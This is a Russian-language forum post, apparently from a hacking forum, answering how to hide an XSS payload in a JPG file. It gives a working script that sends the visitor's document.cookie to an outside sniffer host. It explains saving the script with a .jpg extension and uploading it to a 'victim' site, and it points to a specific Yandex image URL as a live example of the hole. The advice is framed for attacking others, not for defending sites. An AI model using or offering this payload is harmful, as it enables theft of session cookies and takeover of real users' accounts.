09.04.2008, 14:39
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от servior
подскажите как вставить код xss-ки в jpg?
ды очень просто. берёш запихиваеш код передачи куков на сниф
Код:
<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
в текст документ и сохраняеш с расширением .jpg и пытаешся залить эту картинку на сайт жертвы. если есть фильтрация то скажет что формат не поддерживается.. если нет то картинка загрузится и значит xss есть
вот пример такой уязвимости хсс в картинке на яндэксе
http://narod.yandex.ru/community/photo/48/156948.jpg
скрипт в картинке можно залить в поле Фотография когда создаёш сообщество.
но такие хсс в картинках актуальны только под осликом
|
|
|